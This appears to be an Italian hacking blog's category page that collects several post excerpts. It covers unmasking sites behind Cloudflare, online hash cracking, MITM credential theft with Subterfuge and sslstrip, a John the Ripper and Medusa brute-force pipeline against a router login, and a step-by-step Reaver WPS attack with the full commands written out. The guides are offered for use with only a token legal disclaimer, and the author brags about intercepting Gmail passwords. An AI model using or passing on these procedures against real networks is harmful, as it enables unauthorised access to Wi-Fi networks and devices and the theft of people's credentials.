Cloudflare è un servizio CDN e di protezione che viene utilizzato da molti siti web per proteggere la loro infrastruttura e migliorare le prestazioni. Una delle funzionalità offerte da Cloudflare è la protezione dell’indirizzo IP originale del sito web, rendendolo difficile da trovare. Tuttavia, ci sono alcuni metodi che potrebbero aiutarti a scoprire l’indirizzo IP originale di un sito web protetto da Cloudflare, in passato ne avevo già parlato ma esistono nuovi strumenti più efficaci e aggiornati, dunque ho pensato di realizzare un articolo ex-novo. Tieni presente che utilizzare questi metodi per scopi illegali o dannosi potrebbe comportare conseguenze legali.
Hacking
Bard: come registrarsi dall’Italia e accedere all’IA di Google
Bard non ha per ora l’hype di ChatGPT ma avrà (probabilmente) un impatto enorme nei prossimi mesi/anni nell’ecosistema Google e dunque nella nostra vita di utenti, ormai strettamente dipendenti dai servizi dell’azienda di Mountain View.
Tuttavia, con una decisione assai opinabile (che dimostra l’arretratezza della IA di Google rispetto a ChatGPT di OpenAI), Bard non è accessibile dall’Italia e da molte altre nazioni. Il servizio è accessibile, per ora, soltanto dagli Stati Uniti e dal Regno Unito, consentendo peraltro l’utilizzo della sola lingua inglese per interrogare il chatbot. L’accesso a Bard è inoltre limitato da una waiting list: ci si iscrive e si aspetta di ricevere un invito da Google per testare il chatbot.
Crackq: cracking online di handshake WPA e WPA2
Crackq è una new entry in ambito password cracking online. Si tratta di un servizio web gratuito che sfrutta la potenza di un cluster di GPU per attaccare attraverso hashcat in tempi record diversi hash:
- NTLM (~6 min)
- LM (~30 min) – full ASCII keyspace
- MD5 (~11 min)
- WPA/WPA2 (~8 min)
Pulire un file .pcap contenente un WPA handshake
Spesso un file .pcap contenente l’handshake WPA catturato con tool automatici come Wifite risulta sporcato da altri dati, pacchetti catturati che non riguardano il four way handshake tra router e client Wi-Fi. Ecco perché è necessario ripulire la cattura, lasciando soltanto i pacchetti EAPOL che ci interessano.
Su Question Defense ho trovato un metodo che fa uso di tshark, lo riporto come memo personale, ma credo possa tornare utile a chi si diverte con il wireless hacking:
Subterfuge: attacco man in the middle per tutti in pochi clic
Dimenticatevi Ettercap e procedure “complicate” per effettuare un attacco man-in-the-middle (MITM), con Subterfuge anche un bambino è in grado di rubare le credenziali di autenticazione di un client vittima. Non conoscevo questo tool, ancora giovane, ma è stata una scoperta sorprendente.
Uso da anni Ettercap e lo trovo anche semplice ma Subterfuge lo è ancora di più: ha un’interfaccia Web molto chiara che permette di avviare il MITM e visualizzare in tempo reale username e password intercettate dalle connessioni degli utenti vittime del nostro attacco. Inoltre è dotato di moduli aggiuntivi che ne estendono ulteriormente le funzionalità: fake access point, DNS spoofing, Session Hijacking, HTTP Code Injection, spoofing di un server che invii update.
L’installazione su Ubuntu 12.04 (e immagino anche su altre distribuzioni) è molto semplice, basta avviare uno script Python (“sudo python install.py”) che si occuperà del download e del setup di tutto il necessario per usare Subterfuge. Il tool è gestibile da un’interfaccia Web raggiungibile su localhost:80.
Nelle prove che ho effettuato nella mia rete locale sono stato in grado di intercettare username e password di Gmail senza che all’utente venisse mostrato alcun messaggio di connessione insicura, tutto questo è possibile grazie all’utilizzo di sslstrip da parte di Subterfuge.
Il tool come detto è ancora acerbo (l’ultima release è Subterfuge Beta 2.1) e personalmente non sono riuscito ad usare gli altri moduli disponibili ad eccezione del “Credential Harvester” (il modulo che consente l’intercettazione di username e password delle vittime), tuttavia consiglio di provarlo per apprezzarne la semplicità ed efficacia.
Brute force senza dizionario con John the Ripper e Medusa
Veloce segnalazione per non dimenticarmi un metodo per effettuare un attacco brute force senza utilizzare un dizionario servendosi di John the Ripper e Medusa. Nell’esempio che segue il brute force è lanciato contro l’indirizzo 192.168.1.1, provando come username “admin” contro un form web (opzione di Medusa -M web-from):
#john --incremental=all --session=RouterBrute --stdout | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p
nel caso si doveste interrompere e successivamente riprendere il brute force questo è il comando:
#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p
Con i comandi dati in precedenza non si avrà un alert che interrompa il brute force e ci dica se la password è stata individuata per questo si può effettuare un pipe dell’output in un file e successivamente lanciare grep per cercare la stringa “FOUND” per individuare la password del nostro “bersaglio”
#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p >> check.txt
Bucare una rete Wi-Fi protetta con Ubuntu usando Reaver
Fino a qualche giorno fa l’arsenale di chi voleva bucare una rete WiFi protetta era limitato alla suite aircrack-ng (che da poco ho scoperto essere stata eliminata dai repository di Debian e Ubuntu 12.04). Lo scenario è cambiato con l’arrivo di Reaver, programma che sfrutta delle vulnerabilità nel protocollo WiFi Protected Setup (WPS) effettuando un brute force che consente di recuperare la password WPA/WPA2 in poche ore.
Reaver è disponibile in formato sorgente su Google Code e deve essere compilato per funzionare. Per compilare Reaver su Ubuntu è necessario scaricare i seguenti pacchetti:
sudo apt-get install build-essential sudo apt-get install libpcap0.8-dev sudo apt-get install libsqlite3-dev
Scaricata e scompattata l’ultima versione del tool, al momento in cui scrivo reaver-1.3, sarà sufficiente compilarlo con i soliti comandi:
./configure make sudo make install
A questo punto potremo iniziare a “guardarci intorno” per vedere se attorno a noi ci sono router o AP vulnerabili, nella versione 1.3 di reaver è stato incluso walsh un’utility che permette proprio di individuare dispositivi vulnerabili nelle vicinanze. Per usare walsh è necessario mettere la propria scheda wireless in monitor mode, lo si può fare usando airmon-ng (incluso in aircrack-ng) o iwconfig. Con airmon basterà dare:
sudo airmon-ng start wlan0
Nel caso network-manager o altri software interferiscano con la messa in monitor mode della scheda wireless sarà opportuno terminare tutti i processi che possono disturbare l’operazione con:
sudo airmon-ng check kill
Se si preferisce usare iwconfig (personalmente reputo più affidabile il metodo con airmon-ng), utility solitamente già inclusa in qualsiasi distribuzione, basterà invece dare i seguenti comandi per mettere in monitor mode la scheda wireless:
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up
Fatto questo avremo attivato l’interfaccia mon0 necessaria al funzionamento di reaver. Come detto il primo step è usare walsh per individuare router vulnerabili:
sudo walsh -i mon0
L’output sarà una lista di router con relativo MAC address e nome. Se si dovesse ricevere l’errore “Found packet with bad FCS, skipping” allora si dovrà dare a walsh un’opzione per eliminare questo errore e procedere comunque:
sudo walsh -i mon0 --ignore-fcs
Presa nota del MAC address del router da attaccare potremo procedere finalmente al brute force con reaver nel seguente modo:
reaver -i mon0 -b 00:01:02:03:04:05 -vv
si può anche omettere la verbosità dell’output (opzione -vv) ma consiglio di lasciarla perché così si hanno molte più informazioni sull’attacco che si sta eseguendo.
Per rendere più veloce l’attacco è possibile anche diminuire il delay di 1 secondo nell’attacco forza bruta di reaver come spiegato nei reaver-wps hints and tricks:
reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Reaver salva le sue sessioni di attacco nella directory “/etc/reaver” con una estensione .wpc, se si interrompe una sessione e la si vuole riprendere reaver la caricherà in automatico in base al MAC address del router bersaglio, in alternativa si può caricare manualmente una sessione impartendo l’opzione “–session option”. Non aspettatevi comunque tempi troppo veloci, la riuscita del brute force dipende molto dal modello di router attaccato e da quanto tempo il router bersaglio rimane acceso. Una sola annotazione: il mio portatile, durante un test di attacco con reaver, consumava la carica della batteria in pochissimo tempo, segno che il brute force è esoso in termini di utilizzo delle risorse del sistema.